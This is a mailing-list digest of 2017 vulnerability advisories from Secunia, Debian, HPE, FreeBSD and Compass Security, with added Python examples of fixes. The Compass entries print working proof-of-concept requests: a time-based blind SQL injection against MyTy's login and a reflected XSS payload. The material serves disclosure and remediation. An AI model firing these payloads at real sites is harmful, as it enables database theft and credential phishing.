Secunia Research: Oracle Outside In Denial of Service Vulnerability

2017-11-21 Thread Secunia Research
==

 Secunia Research 2017/10/21

  Oracle Outside In Denial of Service Vulnerability

==
Table of Contents

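Affected Software....................1
Severity.............................2
Description of Vulnerability.........3
Solution.............................4
Time Table...........................5
Credits..............................6
References...........................7
About Flexera........................8
Verification.........................9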

==
1) Affected Software

* Oracle Outside In version 8.5.3.0.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to cause a DoS
(Denial of Service).

The vulnerability is caused due to an error within the vstif6.dll,
which can be exploited to cause an out-of-bounds write memory access.

The vulnerability is confirmed in version 8.5.3.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2296870.1

==
5) Time Table

2017/03/14 - Vendor notified about vulnerability.
2017/03/17 - Vendor supplied bug ticket ID.
2017/05/10 - Vendor asks for extension of publishing deadline.
2017/05/11 - Replied to vendor with new publishing timeline.
2017/05/15 - Vendor supplies information of fix in main codeline.
2017/10/17 - Release of vendor patch.
2017/10/18 - Release of Secunia Advisory SA76869.
2017/11/21 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-10051 identifier for the vulnerability.

==
8) About Flexera

Flexera  helps application  producers and enterprises  increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/

Flexera delivers  market-leading  Software  Vulnerability Management
solutions  enabling  enterprises  to  proactively  identify  and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

http://www.flexerasoftware.com/enterprise/products/

Flexera  supports  and  contributes  to  the community in several
ways.  We  have  always  believed  that  reliable  vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be  freely available  for  consumers  to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated  and  stay secure.  End-users (whether private
individuals or businesses) are otherwise left largely alone,  and
that is why back in 2002, Secunia Research started investigating,
coordinating  disclosure  and  verifying software vulnerabilities.
In  2016,  Secunia Research  became  a  part  of  Flexera and today
our in-house software vulnerability research remains the core  of
the  Software  Vulnerability  Management  products  at Flexera.

https://secuniaresearch.flexerasoftware.com/community/research/

The public Secunia Advisory database contains information for
researchers, security enthusiasts, and consumers to look up individual
products and vulnerabilities and assess whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered.

https://secuniaresearch.flexerasoftware.com/community/advisories/

==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2017-18/

==


[SECURITY] [DSA 4045-1] vlc security update

2017-11-21 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4045-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
November 21, 2017 https://www.debian.org/security/faq
- -

Package: vlc
CVE ID : CVE-2017-9300 CVE-2017-10699

Several vulnerabilities have been found in VLC, the VideoLAN project's
media player. Processing malformed media files could lead to denial of
service and potentially the execution of arbitrary code.
   
For the oldstable distribution (jessie), these problems have been fixed
in version 2.2.7-1~deb8u1.

For the stable distribution (stretch), these problems have been fixed in
version 2.2.7-1~deb9u1.

We recommend that you upgrade your vlc packages.

For the detailed security status of vlc please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/vlc

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

-END PGP SIGNATURE-



CSNC-2017-029 MyTy Blind SQL Injection

2017-11-21 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-029
# CVE ID:   -
# Subject:  Blind SQL injection
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger 
# Date: 21.11.2017
#
#

Introduction:
-
MyTy[1] is a software framework that includes a crowdfunding module. It can be 
installed on a customer server and used to create whitelabel websites for 
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding
module login process that allows an unauthenticated attacker to execute
arbitrary SQL queries against the database. This allows an attacker to read and
modify the whole database, within the privilege limitations of the database user
executing the queries.


Affected:
-
Vulnerable:
 * MyTy 5.0.4 to 5.1.6
 
 
Technical Description
-
During the login process, the user email and password are sent in a POST 
request. In this request, the login_email parameter is concatenated into an SQL 
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following 
request:
===
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
=simpleLogin=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
 lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1; 
 _ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703; 
 cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1===%252Fprojekte%252Fsuchergebnisse.html%253F
_type=inline=1=simpleLogin
_email=test'%2b(select*from(select(sleep(20)))a)%2b'_password=1234
===


Workaround / Fix:
-
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL 
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a 
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
-
2017-11-21: Coordinated public disclosure date
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7
2017-09-06: Initial vendor response
2017-09-06: Initial vendor notification
2017-09-06: Discovery by Nicolas Heiniger


References:
---
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap
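
The advisory's fix advice (prepared statements for login_email) can be checked side by side. This is an added Python example, not MyTy code and not part of the Compass advisory: it uses sqlite3 with a hypothetical users table, and a stub SQL function named sleep that records calls instead of delaying, so the payload from the request above shows whether injected SQL executed.

```python
import sqlite3
from urllib.parse import unquote

# login_email value from the advisory's request, URL-decoded (%2b is "+").
ADVISORY_PAYLOAD = unquote("test'%2b(select*from(select(sleep(20)))a)%2b'")


def open_db():
    """In-memory stand-in for the application database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users (email, pw_hash) VALUES (?, ?)",
                 ("alice@example.org", "constructed-hash"))
    calls = []
    # Stub for the database's sleep(): records the call instead of delaying,
    # which makes "did attacker-supplied SQL execute?" directly observable.
    conn.create_function("sleep", 1, lambda seconds: calls.append(seconds) or 0)
    return conn, calls


def lookup_concatenated(conn, login_email):
    """Vulnerable pattern: the parameter becomes part of the SQL text."""
    sql = "SELECT id FROM users WHERE email = '" + login_email + "'"
    return conn.execute(sql).fetchall()


def lookup_prepared(conn, login_email):
    """Fixed pattern: the SQL text is constant and the value is bound."""
    return conn.execute(
        "SELECT id FROM users WHERE email = ?", (login_email,)).fetchall()


def injected_sql_ran(lookup, login_email):
    """Return True if running the lookup called the stub sleep() function."""
    conn, calls = open_db()
    try:
        lookup(conn, login_email)
    finally:
        conn.close()
    return bool(calls)


if __name__ == "__main__":
    for fn in (lookup_concatenated, lookup_prepared):
        print(fn.__name__, "executed injected SQL:",
              injected_sql_ran(fn, ADVISORY_PAYLOAD))
```

With the bound parameter the whole payload is compared as an e-mail string, so the lookup simply finds no user.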


[security bulletin] HPESBHF03798 rev.1 - HPE Proliant Gen10 Servers, DL20 Gen9, ML30 Gen9 and Certain Apollo Servers Using Intel Server Platform Service (SPS) v4.0, Local Denial of Service and Executi

2017-11-21 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03798en_us

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: hpesbhf03798en_us
Version: 1

HPESBHF03798 rev.1 - HPE Proliant Gen10 Servers, DL20 Gen9, ML30 Gen9 and
Certain Apollo Servers Using Intel Server Platform Service (SPS) v4.0, Local
Denial of Service and Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2017-11-21
Last Updated: 2017-11-21

Potential Security Impact: Local: Denial of Service (DoS), Execution of
Arbitrary Code

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Certain HPE Gen10 Servers, DL20 Gen9, ML30 Gen9 and certain Apollo servers
with Intel Server Platform Service (SPS) v4.0 are vulnerable to local Denial
of Service and execution of arbitrary code.

**Note:** Intel has identified security vulnerabilities which could
potentially place impacted platforms at risk. An issue impacts Intel Server
Platform Service (SPS) v4.0 used in certain HPE servers. The SPS/ME firmware
used in Intel's architecture can be compromised with physical access such
that non-authenticated code may be executed in the SPS environment outside of
the visibility of the user and operating system administrator. Intel has
released new revisions of the Intel Server Platform Service (SPS) firmware to
address this vulnerability.

References:

  - CVE-2017-5706 - Intel  server platform service
  - CVE-2017-5709 - Intel  server platform service

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE Apollo 2000 System ROM firmware prior to v1.26
  - HPE Apollo 4510 System ROM firmware prior to v1.26
  - HPE Apollo 6000 DLC System ROM firmware prior to v1.26
  - HPE ProLiant BL460c Gen10 Server Blade ROM firmware prior to v1.26
  - HPE ProLiant DL20 Gen9 Server SPS Firmware prior to v4.01.04.054
  - HPE ProLiant DL360 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant DL380 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant DL560 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant DL580 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant m710x Server Cartridge ROM firmware prior to v1.26
  - HPE ProLiant ML30 Gen9 Server SPS Firmware prior to 4.01.04.054
  - HPE ProLiant ML110 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant ML350 Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL170r Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL190r Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL230k Gen10 Server ROM firmware prior to v1.26
  - HPE ProLiant XL450 Gen10 Server ROM firmware prior to v1.26
  - HPE Synergy 660 Gen10 Compute Module ROM firmware prior to v1.26, SPS
firmware prior to 04.00.04.28
  - HPE Synergy 480 Gen10 Compute Module ROM firmware prior to v1.26, SPS
firmware prior to 04.00.04.28

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2017-5706
  7.4 CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
  7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)

CVE-2017-5709
  7.4 CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N
  5.6 (AV:L/AC:H/Au:N/C:C/I:C/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

RESOLUTION

HPE has provided the following response to resolve the vulnerabilities in
SPS. HPE is working closely with Intel to ensure timely resolution of this
issue on HPE systems. HPE will resolve this vulnerability in our servers in
the following ways.

* For customers that currently have impacted HPE ProLiant and Synergy servers
at their locations, are available for download from HPE's support site.
Customers should refer to the Customer Bulletin HPE Servers:
  
  * [Some Systems Using Certain Intel Processors Are Vulnerable to Local
Denial of Service and Execution of Arbitrary Code for detailed
instructions](https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a0036596en_us)

HISTORY
Version:1 (rev.1) - 21 November 2017 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a 

[SECURITY] [DSA 4044-1] swauth security update

2017-11-21 Thread Yves-Alexis Perez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-4044-1   secur...@debian.org
https://www.debian.org/security/   Yves-Alexis Perez
November 21, 2017 https://www.debian.org/security/faq
- -

Package: swauth
CVE ID : CVE-2017-16613
Debian Bug : 882314

A vulnerability has been discovered in swauth, an authentication system for
Swift, a distributed virtual object store used in OpenStack.

The authentication token for a user is saved in clear text to the log file,
which could enable an attacker with access to the logs to bypass the
authentication provided by swauth.

For the stable distribution (stretch), this problem has been fixed in
version 1.2.0-2+deb9u1.

We recommend that you upgrade your swauth packages.

For the detailed security status of swauth please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/swauth

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-

-END PGP SIGNATURE-



CSNC-2017-030 MyTy Reflected Cross-Site Scripting (XSS)

2017-11-21 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-030
# CVE ID:   -
# Subject:  Reflected Cross-Site Scripting (XSS)
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger 
# Date: 21.11.2017
#
#

Introduction:
-
MyTy[1] is a software framework that includes a crowdfunding module. It can be
installed on a customer server and used to create whitelabel websites for
crowdfunding platforms.

Compass Security discovered a web application security flaw in the login page of
the administration web console that allows an unauthenticated attacker to
execute JavaScript code in the browser of a legitimate user. This allows an
attacker, for instance, to redirect the user to a phishing page and gather
credentials.


Affected:
-
Vulnerable:
 * MyTy 5.1.0 to 5.1.7


Technical Description
-
In the login page of the administration console, a tyLang parameter is passed
together with the user and the password in the login request. This parameter is
then included unencoded in the HTTP response.

The login request for a proof of concept is as follows:
===
POST /tycon/index.php HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [CUT BY COMPASS]
Cookie: tyFl=de_de; XSRF-TOKEN=ZNc%2FZRg4sCgXP0g3IZZ8QxsO7caLshyKp7u75yiyW5o%3D;
 lang=de; PHPSESSID=b4pcsacfvpv716e3l825cqbuo3; tyBl=en_us; cfce=1;
 _ga=GA1.2.75537659.1504612703; cf_cookie_policy_read=1;
 _gid=GA1.2.1498092563.1504761922
CSNC-HEN: Pentest1-Blue
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

view=default==de"alert(1)
_user_id=0_user_hash==admin=123456
===

The HTTP response shows that the payload is returned unencoded in the HTML page:
===
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 07 Sep 2017 06:52:05 GMT
Content-Type: text/html; charset=utf-8

[CUT BY COMPASS]

myty-Login | myty 5.1.7/2017-09-06

var myty = {
version: '5.1.7',
revision: 5001007,
backend: {
basepath: '/tycon',
language: 'de"alert(1)',
themepath: '/tycon/themes/spring'
},
[CUT BY COMPASS]
===


Workaround / Fix:
-
Install an up to date version of the MyTy software.

As a developer:
This issue can be fixed by properly encoding dangerous characters in the output
according to the encoding rules of the respective type of context (HTML body,
argument, JS string, generated URLs). For normal HTML body content, the
following HTML entities can be used:
<->
>->
"->
'->
&->


Timeline:
-
2017-11-21: Coordinated public disclosure date
2017-09-08: Release of fix in version 5.1.8
2017-09-08: Initial vendor response
2017-09-07: Initial vendor notification
2017-09-07: Discovery by Nicolas Heiniger


References:
---
[1] https://www.finlane.com/loesungen/whitelabel-pages/
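
The response above places tyLang inside a JavaScript string within an inline script block, so the encoder has to match that context rather than the HTML body. The following is an added Python example, not MyTy code and not part of the Compass advisory; the allow-list pattern, the function names and the sample value are assumptions.

```python
import json
import re

# Hypothetical allow-list for a language tag such as "de" or "en_us".
LANG_RE = re.compile(r"[a-z]{2}(?:_[a-z]{2})?")

# Constructed sample: a value that tries to leave both the JS string and
# the surrounding script element.
CONSTRUCTED_SAMPLE = 'de"\'</script>'

# Characters that must not appear raw inside an inline <script> block, even
# within a quoted JS string: the HTML parser ends the script element at
# "</script" before the JavaScript parser ever sees the string.
_SCRIPT_UNSAFE = {"<": "\\u003c", ">": "\\u003e",
                  "&": "\\u0026", "'": "\\u0027"}


def js_string_literal(value):
    """Encode value as a double-quoted JS string literal for inline script.

    json.dumps escapes the double quote, the backslash and control
    characters, and (with its default ensure_ascii=True) all non-ASCII
    characters; the remaining HTML-significant characters are replaced
    with \\uXXXX escapes, which JavaScript decodes back to the original.
    """
    literal = json.dumps(value)
    return "".join(_SCRIPT_UNSAFE.get(ch, ch) for ch in literal)


def render_unencoded(ty_lang):
    """Pattern shown in the advisory's response: value copied in as-is."""
    return ("<script>var myty = {backend: {language: '"
            + ty_lang + "'}};</script>")


def render_encoded(ty_lang, default="de"):
    """Validate against the allow-list, then encode for the JS context."""
    if not LANG_RE.fullmatch(ty_lang):
        ty_lang = default  # reject anything that is not a language tag
    return ("<script>var myty = {backend: {language: "
            + js_string_literal(ty_lang) + "}};</script>")


def script_end_tags(html):
    """Count the script end tags an HTML parser would see in html."""
    return html.lower().count("</script")


if __name__ == "__main__":
    print(script_end_tags(render_unencoded(CONSTRUCTED_SAMPLE)))  # 2
    print(script_end_tags(render_encoded(CONSTRUCTED_SAMPLE)))    # 1
    print(js_string_literal(CONSTRUCTED_SAMPLE))
```

Validation and encoding are independent layers here: the allow-list discards the sample entirely, while js_string_literal keeps any value inside the string even where no allow-list is possible.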


FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat [REVISED]

2017-11-21 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:10.kldstat                                    Security Advisory
                                                          The FreeBSD Project

Topic:          Information leak in kldstat(2)

Category:       core
Module:         kernel
Announced:      2017-11-15
Credits:        Ilja van Sprundel
                TJ Corley
Affects:        All supported versions of FreeBSD.
Corrected:      2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE)
                2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4)
                2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15)
                2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE)
                2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3)
                2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:       CVE-2017-1088

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .

0.   Revision history

v1.0   2017-11-15  Initial release.
v1.1   2017-11-20  Corrected credit. Ilja van Sprundel first reported the
   issue to the project, but wasn't cited. The FreeBSD
   Security Team apologizes to Ilja for this oversight.

I.   Background

The kldstat(2) syscall provides information about loaded kld files.  The
syscall takes a userland argument of struct kld_file_stat which is then
filled with data about the kld file requested.

II.  Problem Description

The kernel does not properly clear the memory of the kld_file_stat
structure before filling the data.  Since the structure filled by the
kernel is allocated on the kernel stack and copied to userspace, a leak
of information from the kernel stack is possible.

III. Impact

Some bytes from the kernel stack can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch
# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc
# gpg --verify kldstat.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
 and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -
stable/10/                                                        r325867
releng/10.3/                                                      r325878
releng/10.4/                                                      r325877
stable/11/                                                        r325866
releng/11.0/                                                      r325876
releng/11.1/                                                      r325875
- -

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:



VII. References



The latest revision of this advisory is available at

-BEGIN PGP SIGNATURE-
